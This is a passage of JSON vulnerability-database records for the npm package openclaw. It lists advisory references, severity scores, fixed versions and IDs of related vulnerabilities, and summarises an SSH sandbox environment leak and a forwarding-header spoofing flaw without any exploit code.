lue":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation"},{"reference_url":"https://github.com/advisories/GHSA-cxfr-3qp8-hpmw","reference_id":"GHSA-cxfr-3qp8-hpmw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxfr-3qp8-hpmw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d
4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y
9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2
net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-s
rt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-j
e9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-cxfr-3qp8-hpmw"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sj4d-eenz-zqet"},{"url":"http://public2.vulnerable
code.io/api/vulnerabilities/89991?format=json","vulnerability_id":"VCID-sja9-6t41-hud8","summary":"OpenClaw: SSH-based sandbox backends pass unsanitized process.env to child processes\n## Summary\nSSH-based sandbox backends pass unsanitized process.env to child processes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped SSH sandbox paths leaked unsanitized env into local SSH child processes, but remote leakage needs non-default SSH env forwarding, so the severity is lowered to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `cfe14459531e002a1c61c27d97ec7dc8aecddc1f` — 2026-03-30T20:05:57+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODER
ATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx"},{"reference_url":"https://github.com/advisories/GHSA-j9pv-rrcj-6pfx","reference_id":"GHSA-j9pv-rrcj-6pfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j9pv-rrcj-6pfx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96
jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-un
a1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-j9pv-rrcj-6pfx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sja9-6t41-hud8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91179?format=json","vulnerability_id":"VCID-sw3m-5ryw-jbdh","summary":"OpenClaw: Forwarding header spoofing bypasses gateway.trustedProxies origin detection\n## Summary\nWhen gateway.trustedProxies was configured, spoofed loopback hops in forwarding headers could be accepted as the client origin and weaken downstream auth and rate-limit decisions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## 
Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/net.ts now ignores loopback forwarded hops before trusted-proxy client resolution.\n- That shipped origin fix is the one consumed by canvas auth and gateway auth-rate-limit paths that rely on resolved client identity.\n\nOpenClaw thanks @lintsinghua for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35656","reference_id":"","reference_type":"","scores":[{"value":"0.00224","scoring_system":"epss","scoring_elements":"0.45223","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00224","scoring_system":"epss","scoring_elements":"0.45206","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00224","scoring_system":"epss","scoring_elements":"0.45226","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35656"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}]
,"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35656","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N